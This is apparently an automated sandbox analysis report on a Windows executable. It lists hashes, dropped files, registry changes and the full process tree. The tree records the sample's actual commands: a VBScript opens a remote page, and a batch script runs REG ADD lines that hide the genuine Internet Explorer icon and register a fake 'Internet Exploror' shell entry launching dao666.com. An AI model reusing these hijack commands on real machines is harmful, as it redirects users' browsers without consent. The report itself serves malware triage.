aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c

Analysis

max time kernel
98s
max time network
141s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
01/12/2022, 13:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe
Size

111KB
MD5

b47521b53daafca6ff9d890bd6adb42a
SHA1

196b0983da2c215ac9931ffddf78e766c2d1761b
SHA256

aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c
SHA512

fedf94d2505cbde019fc404c3c71db552d0bc74425b3364064acda568b91bb7d3b8ceed5db87b00a94a9a5e75f54869cbc6df95e595f899dc4b0932359fc3043
SSDEEP

3072:WwxVMhOC/dTDbq91+mno3t4QZQ3rAHfip:WTfFDbRnOTrA/a

Score

4^/10

Malware Config

Signatures

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WinsWare\winare.vbs	cmd.exe
File created	C:\Program Files\WinsWare\361.cmd	cmd.exe
File opened for modification	C:\Program Files\WinsWare\361.cmd	cmd.exe
File created	C:\Program Files\WinsWare\is.cmd	cmd.exe
File opened for modification	C:\Program Files\WinsWare\is.cmd	cmd.exe
File created	C:\Program Files\WinsWare\to.cmd	cmd.exe
File opened for modification	C:\Program Files\WinsWare\to.cmd	cmd.exe
File created	C:\Program Files\WinsWare\winare.vbs	cmd.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Mail\UltraEdls\is.cmd	cmd.exe
File opened for modification	C:\Windows\Mail\UltraEdls\is.cmd	cmd.exe
File created	C:\Windows\Mail\UltraEdls\winare.vbs	cmd.exe
File opened for modification	C:\Windows\Mail\UltraEdls\winare.vbs	cmd.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1612	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000160a598cd770a945813ca0908d18e82900000000020000000000106600000001000020000000974bd47b69d67611e7a65062b9ef0c2d58bbf7e134f103e7484669aa7276ab15000000000e80000000020000200000002e95bb93e87ce7846f2315e5d0425505d7b7262a7ac9b2d769903c0d4fa9183520000000847faeeebb7ed39b3ea9493ff022a195b7d0f2cc0c58b6820dbc48bffab3d83140000000cc29d84512ae24e9a1689b2ac6ec1c1b3ca545e6875bde3d7fb509d741461708e5f89cc351df42114ad1e1dd2ecd2be76dcc6d922000a7abbed98c78035a63a9	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376860015"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1B4C8171-733F-11ED-AA9B-EE0F1DD48A27} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9049d5ff4b07d901	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000160a598cd770a945813ca0908d18e82900000000020000000000106600000001000020000000fbf4dcabde86f00ffac6090a31ca49719e156a388c46e7a205a3f611dbcc93eb000000000e80000000020000200000002671b8c9761f0ab02ca494687779ff8322b7ddf65ce61a9f4cb90454f8da418c900000002e16a744b173e046a26f14e57622b3a42a1167ba7d90434794069db5bbcc78f710a6df1dcd3fa7d555ee302c20e152758bb39b833daca79d858dfbd2d7c93609fa4d2aff4de452b58ad001f2d652147562dfc11cd830dccc27e45e74dcbee807aca03b12ea5a33cf61076d414c7b16ffde0ccef5c33756d73fd65ee55970b6e21ff984e6fc7b31b0b9e181897b6f5a2b400000008fcdbc77c99c487b5c71e584eb947461a0136894fa58e9c6f04e42610a8020f647ddd7fccdcb7c299fc554c57467decf3c0814c0092ce14d6cc55f41176fff7c	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe

Modifies registry class 44 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe

Runs net.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
268	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
268	iexplore.exe
268	iexplore.exe
1780	IEXPLORE.EXE
1780	IEXPLORE.EXE
1780	IEXPLORE.EXE
1780	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1264 wrote to memory of 2032	1264	aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe	27
PID 1264 wrote to memory of 2032	1264	aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe	27
PID 1264 wrote to memory of 2032	1264	aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe	27
PID 1264 wrote to memory of 2032	1264	aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe	27
PID 2032 wrote to memory of 1660	2032	WScript.exe	28
PID 2032 wrote to memory of 1660	2032	WScript.exe	28
PID 2032 wrote to memory of 1660	2032	WScript.exe	28
PID 2032 wrote to memory of 1660	2032	WScript.exe	28
PID 1660 wrote to memory of 268	1660	cmd.exe	30
PID 1660 wrote to memory of 268	1660	cmd.exe	30
PID 1660 wrote to memory of 268	1660	cmd.exe	30
PID 1660 wrote to memory of 268	1660	cmd.exe	30
PID 2032 wrote to memory of 560	2032	WScript.exe	31
PID 2032 wrote to memory of 560	2032	WScript.exe	31
PID 2032 wrote to memory of 560	2032	WScript.exe	31
PID 2032 wrote to memory of 560	2032	WScript.exe	31
PID 560 wrote to memory of 1716	560	cmd.exe	33
PID 560 wrote to memory of 1716	560	cmd.exe	33
PID 560 wrote to memory of 1716	560	cmd.exe	33
PID 560 wrote to memory of 1716	560	cmd.exe	33
PID 560 wrote to memory of 360	560	cmd.exe	34
PID 560 wrote to memory of 360	560	cmd.exe	34
PID 560 wrote to memory of 360	560	cmd.exe	34
PID 560 wrote to memory of 360	560	cmd.exe	34
PID 560 wrote to memory of 1496	560	cmd.exe	36
PID 560 wrote to memory of 1496	560	cmd.exe	36
PID 560 wrote to memory of 1496	560	cmd.exe	36
PID 560 wrote to memory of 1496	560	cmd.exe	36
PID 560 wrote to memory of 872	560	cmd.exe	37
PID 560 wrote to memory of 872	560	cmd.exe	37
PID 560 wrote to memory of 872	560	cmd.exe	37
PID 560 wrote to memory of 872	560	cmd.exe	37
PID 560 wrote to memory of 968	560	cmd.exe	38
PID 560 wrote to memory of 968	560	cmd.exe	38
PID 560 wrote to memory of 968	560	cmd.exe	38
PID 560 wrote to memory of 968	560	cmd.exe	38
PID 560 wrote to memory of 1332	560	cmd.exe	39
PID 560 wrote to memory of 1332	560	cmd.exe	39
PID 560 wrote to memory of 1332	560	cmd.exe	39
PID 560 wrote to memory of 1332	560	cmd.exe	39
PID 560 wrote to memory of 1500	560	cmd.exe	40
PID 560 wrote to memory of 1500	560	cmd.exe	40
PID 560 wrote to memory of 1500	560	cmd.exe	40
PID 560 wrote to memory of 1500	560	cmd.exe	40
PID 560 wrote to memory of 1480	560	cmd.exe	41
PID 560 wrote to memory of 1480	560	cmd.exe	41
PID 560 wrote to memory of 1480	560	cmd.exe	41
PID 560 wrote to memory of 1480	560	cmd.exe	41
PID 268 wrote to memory of 1780	268	iexplore.exe	43
PID 268 wrote to memory of 1780	268	iexplore.exe	43
PID 268 wrote to memory of 1780	268	iexplore.exe	43
PID 268 wrote to memory of 1780	268	iexplore.exe	43
PID 560 wrote to memory of 284	560	cmd.exe	42
PID 560 wrote to memory of 284	560	cmd.exe	42
PID 560 wrote to memory of 284	560	cmd.exe	42
PID 560 wrote to memory of 284	560	cmd.exe	42
PID 560 wrote to memory of 340	560	cmd.exe	44
PID 560 wrote to memory of 340	560	cmd.exe	44
PID 560 wrote to memory of 340	560	cmd.exe	44
PID 560 wrote to memory of 340	560	cmd.exe	44
PID 560 wrote to memory of 1620	560	cmd.exe	45
PID 560 wrote to memory of 1620	560	cmd.exe	45
PID 560 wrote to memory of 1620	560	cmd.exe	45
PID 560 wrote to memory of 1620	560	cmd.exe	45

C:\Users\Admin\AppData\Local\Temp\aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe
"C:\Users\Admin\AppData\Local\Temp\aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1264
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\7xdown.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C start /min iexplore http://447.cc/index2.html?7xdown
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1660
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://447.cc/index2.html?7xdown
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:268
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:268 CREDAT:275457 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1780
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\to.cmd
    3⤵
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:560
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t REG_DWORD /d 1 /f
      4⤵
      PID:1716
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      Modifies registry class
      PID:360
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
      4⤵
      Modifies registry class
      PID:1496
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
      4⤵
      Modifies registry class
      PID:872
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
      4⤵
      Modifies registry class
      PID:968
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
      4⤵
      Modifies registry class
      PID:1332
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
      4⤵
      Modifies registry class
      PID:1500
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
      4⤵
      Modifies registry class
      PID:1480
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
      4⤵
      Modifies registry class
      PID:284
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
      4⤵
      Modifies registry class
      PID:340
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
      4⤵
      Modifies registry class
      PID:1620
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
      4⤵
      Modifies registry class
      PID:1028
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
      4⤵
      Modifies registry class
      PID:1604
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
      4⤵
      Modifies registry class
      PID:900
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f
      4⤵
      Modifies registry class
      PID:1988
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
      4⤵
      Modifies registry class
      PID:1800
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
      4⤵
      Modifies registry class
      PID:1916
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f
      4⤵
      Modifies registry class
      PID:1228
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
      4⤵
      Modifies registry class
      PID:1132
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry class
      PID:964
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:952
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:948
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:904
